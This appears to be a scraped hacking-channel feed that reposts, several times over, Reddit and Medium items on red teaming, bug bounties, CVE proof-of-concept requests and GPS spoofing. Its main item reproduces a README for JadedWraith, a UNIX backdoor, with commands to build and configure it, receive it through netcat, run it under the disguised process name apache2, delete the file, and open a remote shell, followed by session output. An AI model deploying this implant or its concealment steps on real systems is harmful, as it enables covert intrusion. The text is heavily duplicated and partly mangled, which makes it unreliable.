Interested to collab?
https://www.reddit.com/r/redteamsec/comments/pvycw1/interested_to_collab/
Hi folks, I am currently looking for someone to collab and work together on Injector. Link : https://github.com/0xDivyanshu/Injector If anyone is interested please let me know in DM. I believe this is great opportunity to learn abt deep into Evasions on windows. Thanks! Reason for looking for Collab is I'm literally hitting walls every day and getting frustrated.. So thought of collaborating. submitted by /u/0xdeadbeef0000 (https://www.reddit.com/user/0xdeadbeef0000)
[link] (https://www.reddit.com/r/redteamsec/comments/pvycw1/interested_to_collab/) [comments] (https://www.reddit.com/r/redteamsec/comments/pvycw1/interested_to_collab/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/pvycw1/interested_to_collab/
Hi folks, I am currently looking for someone to collab and work together on Injector. Link : https://github.com/0xDivyanshu/Injector If anyone is interested please let me know in DM. I believe this is great opportunity to learn abt deep into Evasions on windows. Thanks! Reason for looking for Collab is I'm literally hitting walls every day and getting frustrated.. So thought of collaborating. submitted by /u/0xdeadbeef0000 (https://www.reddit.com/user/0xdeadbeef0000)
[link] (https://www.reddit.com/r/redteamsec/comments/pvycw1/interested_to_collab/) [comments] (https://www.reddit.com/r/redteamsec/comments/pvycw1/interested_to_collab/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
r/redteamsec on Reddit: Interested to collab?
Posted by u/0xdeadbeef0000 - 13 votes and no comments
WE WANT YOU! Join Mask 2.0 Beta Test, Win Bug Bounties!
https://masknetwork.medium.com/we-want-you-join-mask-2-0-beta-test-win-bug-bounties-d9e366dbe380?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://masknetwork.medium.com/we-want-you-join-mask-2-0-beta-test-win-bug-bounties-d9e366dbe380?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
WE WANT YOU! Join Mask 2.0 Beta Test, Win Bug Bounties!
The Mask extension is about to go through some major updates. The Mask 2.0 is finally here!
The Mask extension is about to go through some major updates. The Mask 2.0 is finally here!Continue reading on Medium » (https://masknetwork.medium.com/we-want-you-join-mask-2-0-beta-test-win-bug-bounties-d9e366dbe380?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
WE WANT YOU! Join Mask 2.0 Beta Test, Win Bug Bounties!
The Mask extension is about to go through some major updates. The Mask 2.0 is finally here!
How to hack your way to an OSCP or any cert voucher through Synack and Hack the Box.
https://medium.com/@0xSleepy/how-to-hack-your-way-to-an-oscp-or-any-cert-voucher-through-synack-and-hack-the-box-e50642296708?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@0xSleepy/how-to-hack-your-way-to-an-oscp-or-any-cert-voucher-through-synack-and-hack-the-box-e50642296708?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to hack your way to an OSCP or any cert voucher through Synack and Hack the Box.
How do you break into the industry without breaking the bank?
How do you break into the industry without breaking the bank?Continue reading on Medium » (https://medium.com/@0xSleepy/how-to-hack-your-way-to-an-oscp-or-any-cert-voucher-through-synack-and-hack-the-box-e50642296708?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to hack your way to an OSCP or any cert voucher through Synack and Hack the Box.
How do you break into the industry without breaking the bank?
hacking: security in practice
Does any one have CVE-2017-14746 POC?
I am a student and currently doing a research on Use-after-free vulnerability in Samba 4.x. I can't find any PoC of this CVE on google. If any one have it please share. Thank you.
submitted by /u/randomclone99
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Does any one have CVE-2017-14746 POC?
I am a student and currently doing a research on Use-after-free vulnerability in Samba 4.x. I can't find any PoC of this CVE on google. If any one have it please share. Thank you.
submitted by /u/randomclone99
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Does any one have CVE-2017-14746 POC?
I am a student and currently doing a research on Use-after-free vulnerability in Samba 4.x. I can't find any PoC of this CVE on google. If any one...
hacking: security in practice
GPS spoofing
I’m trying to figure out a cheap solution to spoof a gps location for a device. The device can connect wireless to my WiFi, or with a LAN cable, or to a cell hotspot, so either a hardware or app solution could work. I did search the App Store on my iPhone, but unless I’m missing something obvious I don’t see anything out there.
Any help is appreciated
submitted by /u/randomdudeinFL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
GPS spoofing
I’m trying to figure out a cheap solution to spoof a gps location for a device. The device can connect wireless to my WiFi, or with a LAN cable, or to a cell hotspot, so either a hardware or app solution could work. I did search the App Store on my iPhone, but unless I’m missing something obvious I don’t see anything out there.
Any help is appreciated
submitted by /u/randomdudeinFL
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
GPS spoofing
I’m trying to figure out a cheap solution to spoof a gps location for a device. The device can connect wireless to my WiFi, or with a LAN cable,...
hacking: security in practice
Someone found my public Ip through Skype and disabled my internet connection
No idea if this is the right place for this. Please redirect me to a more suitable sub if that’s the case.
This was many years ago but someone who I was playing multiplayer games with online years ago and had added on Skype found my public IP address and also managed to remotely disable my internet access.
The guy had hacked me and a friend, found both of our public IPs and disabling both of our access to internet.
How might he have found our IPs? Would this be an instance of a DDos attack? And how might I be able to protect myself in the future against these sorts of instances?
submitted by /u/jsn2918
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Someone found my public Ip through Skype and disabled my internet connection
No idea if this is the right place for this. Please redirect me to a more suitable sub if that’s the case.
This was many years ago but someone who I was playing multiplayer games with online years ago and had added on Skype found my public IP address and also managed to remotely disable my internet access.
The guy had hacked me and a friend, found both of our public IPs and disabling both of our access to internet.
How might he have found our IPs? Would this be an instance of a DDos attack? And how might I be able to protect myself in the future against these sorts of instances?
submitted by /u/jsn2918
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Someone found my public Ip through Skype and disabled my internet...
No idea if this is the right place for this. Please redirect me to a more suitable sub if that’s the case. This was many years ago but someone...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Vulnerabilities room for conceptual clarity
https://external-preview.redd.it/_QBl6sxxB8-A3gZQrm3xPhT-OGZfTMCX_pHsWzq6JsY.jpg?width=320&crop=smart&auto=webp&s=4470a64fb4417a9c3fd77b5ca669154debff52fb submitted by /u/the_simp_lust_man
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Vulnerabilities room for conceptual clarity
https://external-preview.redd.it/_QBl6sxxB8-A3gZQrm3xPhT-OGZfTMCX_pHsWzq6JsY.jpg?width=320&crop=smart&auto=webp&s=4470a64fb4417a9c3fd77b5ca669154debff52fb submitted by /u/the_simp_lust_man
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Vulnerabilities room for conceptual clarity
Posted in r/hacking by u/the_simp_lust_man • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cryptography (1–5 Levels)
https://cdn-images-1.medium.com/max/2600/1*dXLqRFpXKC0Joxl-7lFpdw.png
Hey, I know you are probably scared of Cryptography, let’s be honest, you probably are not familiar or you think you know it but you don’t…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Cryptography (1–5 Levels)
https://cdn-images-1.medium.com/max/2600/1*dXLqRFpXKC0Joxl-7lFpdw.png
Hey, I know you are probably scared of Cryptography, let’s be honest, you probably are not familiar or you think you know it but you don’t…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cryptography (1–5 Levels)
Hey, I know you are probably scared of Cryptography, let’s be honest, you probably are not familiar or you think you know it but you don’t…
JadedWraith - Light-weight UNIX Backdoor
http://www.kitploit.com/2021/09/jadedwraith-light-weight-unix-backdoor.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/09/jadedwraith-light-weight-unix-backdoor.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
JadedWraith - Light-weight UNIX Backdoor
Components
The source code for the actual implant can be found inside the src directory. client contains a simple python based client for interacting with JadedWraith. The conf_jawr script is used to configure new JadedWraith executables.
Dependencies
The implant requires a modern C library and libpthread. Depending on the target operating system, libpcap (https://www.kitploit.com/search/label/LibPCAP) may be required (In which case, it you must run the ./configure script with --use-libpcap to enable libpcap support). The Python configuration script and client require the the following packages to work: termcolor, pycryptodomex
How to compile
Simply use the Makefile to compile. Note: The resulting binaries found in bin must be configured before they can be used. $ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf
How to configure
Use the conf_jawr script to configure JadedWraith executables. It will search the bin directory for JadedWraith executables to configure. The configured binary will be written to the configured directory. -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell ">$ ./conf_jawr
JadedWraith Configuration
Please choose a JadedWraith binary to use:
1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] :
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] :
argv[0] (Leave blank to not spoof command) [] :
JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin
Try me!
sudo ./wraith-client.py -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell
How to install
A configured implant can simply be ran on the target system. If configured to use the passive ICMP functionality, it must be ran as root. The environmental variable _CMD can be used to spoof the process's argv[] apache2 # chmod +x apache2 # _CMD="/usr/sbin/apache2" ./apache2 # rm apache2 '># cd /tmp
# nc -lvp 4444 > apache2
# chmod +x apache2
# _CMD="/usr/sbin/apache2" ./apache2
# rm apache2
How to interact
The wraith-client.py script inside client can be used to interact with JadedWraith. Simply invoke it with the arguments produced by the conf_jawr script, substituting the target's IP for . If utilizing the ICMP functionality, the script must be ran as root to send the ICMP packet. sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 192.168.100.224 [*] backdoor will listen on port 58290 [*] connecting to 192.168.100.224:58290 [+] connection established! [*] entering interactive shell >> .cd /tmp >> w 14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23 USER TTY LOGIN@ IDLE JCPU PCPU WHAT >> ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 11:20 ? 00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31 >> .exit $ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 127.0.0.1 [*] backdoor will connect to port 37943 [*] listening on port 37943 [+] accepted connection! [*] entering interactive shell >> ">$ ~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[*] backdoor will listen on port 58290
[*] connecting to 192.168.100.224:58290
[+] connection established!
[*] entering interactive shell
>> .cd /tmp
>> w
14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23
___________________________
@hacking_Attack
@Hacking_Video
The source code for the actual implant can be found inside the src directory. client contains a simple python based client for interacting with JadedWraith. The conf_jawr script is used to configure new JadedWraith executables.
Dependencies
The implant requires a modern C library and libpthread. Depending on the target operating system, libpcap (https://www.kitploit.com/search/label/LibPCAP) may be required (In which case, it you must run the ./configure script with --use-libpcap to enable libpcap support). The Python configuration script and client require the the following packages to work: termcolor, pycryptodomex
How to compile
Simply use the Makefile to compile. Note: The resulting binaries found in bin must be configured before they can be used. $ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf
How to configure
Use the conf_jawr script to configure JadedWraith executables. It will search the bin directory for JadedWraith executables to configure. The configured binary will be written to the configured directory. -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell ">$ ./conf_jawr
JadedWraith Configuration
Please choose a JadedWraith binary to use:
1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] :
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] :
argv[0] (Leave blank to not spoof command) [] :
JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin
Try me!
sudo ./wraith-client.py -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell
How to install
A configured implant can simply be ran on the target system. If configured to use the passive ICMP functionality, it must be ran as root. The environmental variable _CMD can be used to spoof the process's argv[] apache2 # chmod +x apache2 # _CMD="/usr/sbin/apache2" ./apache2 # rm apache2 '># cd /tmp
# nc -lvp 4444 > apache2
# chmod +x apache2
# _CMD="/usr/sbin/apache2" ./apache2
# rm apache2
How to interact
The wraith-client.py script inside client can be used to interact with JadedWraith. Simply invoke it with the arguments produced by the conf_jawr script, substituting the target's IP for . If utilizing the ICMP functionality, the script must be ran as root to send the ICMP packet. sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 192.168.100.224 [*] backdoor will listen on port 58290 [*] connecting to 192.168.100.224:58290 [+] connection established! [*] entering interactive shell >> .cd /tmp >> w 14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23 USER TTY LOGIN@ IDLE JCPU PCPU WHAT >> ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 11:20 ? 00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31 >> .exit $ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 127.0.0.1 [*] backdoor will connect to port 37943 [*] listening on port 37943 [+] accepted connection! [*] entering interactive shell >> ">$ ~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[*] backdoor will listen on port 58290
[*] connecting to 192.168.100.224:58290
[+] connection established!
[*] entering interactive shell
>> .cd /tmp
>> w
14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
>> ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 11:20 ? 00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
>> .exit
$ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 127.0.0.1
[*] backdoor will c onnect to port 37943
[*] listening on port 37943
[+] accepted connection!
[*] entering interactive shell
>>
Bugs
I'm sure this has plenty of bugs. Let me know if you find any. I wrote this over a few days and the code isn't my proudest. Feel free to report any issues and I'll try to fix them.
Download JadedWraith (https://github.com/phath0m/JadedWraith)
___________________________
@hacking_Attack
@Hacking_Video
>> ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 11:20 ? 00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
>> .exit
$ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 127.0.0.1
[*] backdoor will c onnect to port 37943
[*] listening on port 37943
[+] accepted connection!
[*] entering interactive shell
>>
Bugs
I'm sure this has plenty of bugs. Let me know if you find any. I wrote this over a few days and the code isn't my proudest. Feel free to report any issues and I'll try to fix them.
Download JadedWraith (https://github.com/phath0m/JadedWraith)
___________________________
@hacking_Attack
@Hacking_Video
Handwritten enumeration anyone?
https://www.reddit.com/r/Pentesting/comments/pw3oj8/handwritten_enumeration_anyone/
submitted by /u/I_AM_ALWAYS_ANGRY (https://www.reddit.com/user/I_AM_ALWAYS_ANGRY)
[link] (https://www.reddit.com/r/hackthebox/comments/pw3gic/handwritten_enumeration_anyone/) [comments] (https://www.reddit.com/r/Pentesting/comments/pw3oj8/handwritten_enumeration_anyone/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/pw3oj8/handwritten_enumeration_anyone/
submitted by /u/I_AM_ALWAYS_ANGRY (https://www.reddit.com/user/I_AM_ALWAYS_ANGRY)
[link] (https://www.reddit.com/r/hackthebox/comments/pw3gic/handwritten_enumeration_anyone/) [comments] (https://www.reddit.com/r/Pentesting/comments/pw3oj8/handwritten_enumeration_anyone/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Handwritten enumeration anyone?
Posted in r/Pentesting by u/I_AM_ALWAYS_ANGRY • 1 point and 0 comments
KitPloit - PenTest Tools!
JadedWraith - Light-weight UNIX Backdoor
___________________________
@hacking_Attack
@Hacking_Video
JadedWraith - Light-weight UNIX Backdoor
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
JadedWraith - Light-weight UNIX Backdoor